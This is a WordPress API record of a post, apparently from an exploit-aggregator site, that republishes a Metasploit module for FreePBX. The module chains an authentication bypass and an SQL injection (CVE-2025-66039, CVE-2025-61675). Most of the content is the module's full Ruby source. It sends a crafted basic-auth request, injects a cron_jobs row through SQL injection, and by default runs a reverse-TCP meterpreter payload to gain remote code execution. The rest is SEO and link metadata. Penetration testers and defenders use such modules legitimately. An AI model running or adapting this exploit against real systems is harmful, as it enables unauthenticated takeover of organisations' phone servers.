{"id":38187,"date":"2026-01-29T13:40:15","date_gmt":"2026-01-29T13:40:15","guid":{"rendered":"http:\/\/localhost\/?p=38187"},"modified":"2026-01-29T13:40:15","modified_gmt":"2026-01-29T13:40:15","slug":"freepbx-endpoint-sqli-to-rce","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=38187","title":{"rendered":"FreePBX endpoint SQLi to RCE_MSF:EXPLOIT-UNIX-HTTP-FREEPBX_CUSTOM_EXTENSION_RCE-"},"content":{"rendered":"

{“lastseen”:”2026-01-29T19:28:02″,”description”:”FreePBX is an open-source IP PBX management tool that provides a modern phone system for businesses that use VoIP to make and receive phone calls. Versions before 16.0.44 and 17.0.23 are vulnerable to CVE-2025-66039, while versions before 16.0.92 and…”,”published”:”2026-01-29T18:58:58″,”modified”:”2026-01-29T18:58:58″,”type”:”metasploit”,”title”:”FreePBX endpoint SQLi to RCE”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-UNIX-HTTP-FREEPBX_CUSTOM_EXTENSION_RCE-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-61675″,”CVE-2025-66039″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n\\n include Msf::Exploit::Remote::HttpClient\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘FreePBX endpoint SQLi to RCE’,\\n ‘Description’ =\\u003e %q{\\n FreePBX is an open-source IP PBX management tool that provides a modern phone system for businesses that use\\n VoIP to make and receive phone calls. Versions before 16.0.44 and 17.0.23 are vulnerable to CVE-2025-66039,\\n while versions before 16.0.92 and 17.0.6 are vulnerable to CVE-2025-61675. The former represents an\\n authentication bypass: when FreePBX uses Webserver Authorization Mode (an option the admin can enable), it\\n allows an attacker to authenticate as any user. The latter CVE describes multiple SQL injections; this module\\n exploits the SQL injection in the custom extension component. The module chains these vulnerabilities into an\\n unauthenticated SQL injection attack and gains remote code execution by injecting an SQL record into th\\n cron_jobs table. The cron_jobs database contains cron tasks that FreePBX executes in the context of the\\n operating system.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘Noah King’, # research\\n ‘msutovsky-r7’, # module\\n ],\\n ‘References’ =\\u003e [\\n [ ‘CVE’, ‘2025-66039’], # Authentication Bypass\\n [ ‘CVE’, ‘2025-61675’], # SQL injections\\n [ ‘URL’, ‘https:\/\/horizon3.ai\/attack-research\/the-freepbx-rabbit-hole-cve-2025-66039-and-others\/’]\\n ],\\n ‘Platform’ =\\u003e [‘linux’],\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Targets’ =\\u003e [\\n [\\n ‘Unix Command’,\\n {\\n ‘DefaultOptions’ =\\u003e\\n {\\n ‘Payload’ =\\u003e ‘cmd\/linux\/http\/x64\/meterpreter\/reverse_tcp’,\\n ‘WfsDelay’ =\\u003e 70 # cronjob may take up to a minute to start\\n }\\n }\\n ]\\n ],\\n ‘Privileged’ =\\u003e false,\\n ‘DisclosureDate’ =\\u003e ‘2025-12-11’,\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\\n }\\n )\\n )\\n\\n register_options(\\n [\\n OptString.new(‘USERNAME’, [true, ‘A valid FreePBX user’]),\\n ]\\n )\\n end\\n\\n def sqli_custom_extension(payload)\\n send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(‘admin’, ‘config.php’),\\n ‘method’ =\\u003e ‘POST’,\\n ‘headers’ =\\u003e {\\n ‘Authorization’ =\\u003e basic_auth(datastore[‘USERNAME’], Rex::Text.rand_text_alphanumeric(6))\\n },\\n ‘vars_get’ =\\u003e {\\n ‘display’ =\\u003e ‘endpoint’,\\n ‘view’ =\\u003e ‘customExt’\\n },\\n ‘vars_post’ =\\u003e {\\n ‘id’ =\\u003e payload\\n }\\n })\\n end\\n\\n def check\\n res = sqli_custom_extension(%(‘))\\n if res\\u0026.code == 500\\n return Exploit::CheckCode::Vulnerable(‘Detected SQL injection with authentication bypass’)\\n end\\n\\n Exploit::CheckCode::Safe(‘No SQL injection detected, target is patched’)\\n end\\n\\n def exploit\\n @job_name = Rex::Text.rand_text_alpha(8..12)\\n\\n rce_payload = ‘INSERT INTO cron_jobs (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order)’\\n rce_payload += \\” VALUES (‘sysadmin’,’#{@job_name}’,’#{payload.encoded}’,NULL,’* * * * *’,30,1,1)\\”\\n\\n res = sqli_custom_extension(%(1′;#{rce_payload} — ))\\n\\n if res\\u0026.code == 401\\n print_good(\\”Created cronjob with job name: ‘#{@job_name}’\\”)\\n print_status(‘Waiting for cronjob to trigger…’)\\n else\\n fail_with(Failure::PayloadFailed, ‘Cronjob was not created.’)\\n end\\n end\\n\\n def cleanup\\n super\\n\\n return unless @job_name\\n\\n # Remove the created cronjob\\n res = sqli_custom_extension(%(‘; DELETE FROM cron_jobs WHERE jobname=’#{@job_name}’ — ))\\n\\n print_status(‘Attempting to perform cleanup’)\\n\\n if res\\u0026.code == 401\\n print_good(‘Cronjob removed.’)\\n else\\n print_bad(\\”Cronjob #{@job_name} not removed, please perform manual cleanup!\\”)\\n end\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/unix\/http\/freepbx_custom_extension_rce.rb”,”cvss”:{“score”:9.3,”severity”:”CRITICAL”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:H\/SC:N\/VI:H\/SI:N\/VA:H\/SA:N”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/unix\/http\/freepbx_custom_extension_rce\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-01-29T19:28:02″,”description”:”FreePBX is an open-source IP PBX management tool that provides a modern phone system for businesses that use VoIP to make and receive phone calls….<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,55,12,169,13,7,11,5],"class_list":["post-38187","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-93","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\nFreePBX endpoint SQLi to RCE_MSF:EXPLOIT-UNIX-HTTP-FREEPBX_CUSTOM_EXTENSION_RCE- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=38187\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"FreePBX endpoint SQLi to RCE_MSF:EXPLOIT-UNIX-HTTP-FREEPBX_CUSTOM_EXTENSION_RCE- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-01-29T19:28:02″,”description”:”FreePBX is an open-source IP PBX management tool that provides a modern phone system for businesses that use VoIP to make and receive phone calls....\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=38187\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-29T13:40:15+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38187#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38187\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"FreePBX endpoint SQLi to RCE_MSF:EXPLOIT-UNIX-HTTP-FREEPBX_CUSTOM_EXTENSION_RCE-\",\"datePublished\":\"2026-01-29T13:40:15+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38187\"},\"wordCount\":825,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.3\",\"exploit\",\"metasploit\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=38187#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38187\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38187\",\"name\":\"FreePBX endpoint SQLi to RCE_MSF:EXPLOIT-UNIX-HTTP-FREEPBX_CUSTOM_EXTENSION_RCE- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-01-29T13:40:15+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38187#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=38187\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38187#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"FreePBX endpoint SQLi to RCE_MSF:EXPLOIT-UNIX-HTTP-FREEPBX_CUSTOM_EXTENSION_RCE-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"FreePBX endpoint SQLi to RCE_MSF:EXPLOIT-UNIX-HTTP-FREEPBX_CUSTOM_EXTENSION_RCE- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=38187","og_locale":"en_US","og_type":"article","og_title":"FreePBX endpoint SQLi to RCE_MSF:EXPLOIT-UNIX-HTTP-FREEPBX_CUSTOM_EXTENSION_RCE- zero redgem","og_description":"{“lastseen”:”2026-01-29T19:28:02″,”description”:”FreePBX is an open-source IP PBX management tool that provides a modern phone system for businesses that use VoIP to make and receive phone calls....","og_url":"https:\/\/zero.redgem.net\/?p=38187","og_site_name":"zero redgem","article_published_time":"2026-01-29T13:40:15+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=38187#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=38187"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"FreePBX endpoint SQLi to RCE_MSF:EXPLOIT-UNIX-HTTP-FREEPBX_CUSTOM_EXTENSION_RCE-","datePublished":"2026-01-29T13:40:15+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=38187"},"wordCount":825,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.3","exploit","metasploit","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=38187#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=38187","url":"https:\/\/zero.redgem.net\/?p=38187","name":"FreePBX endpoint SQLi to RCE_MSF:EXPLOIT-UNIX-HTTP-FREEPBX_CUSTOM_EXTENSION_RCE- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-01-29T13:40:15+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=38187#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=38187"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=38187#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"FreePBX endpoint SQLi to RCE_MSF:EXPLOIT-UNIX-HTTP-FREEPBX_CUSTOM_EXTENSION_RCE-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/38187","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=38187"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/38187\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=38187"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=38187"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=38187"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}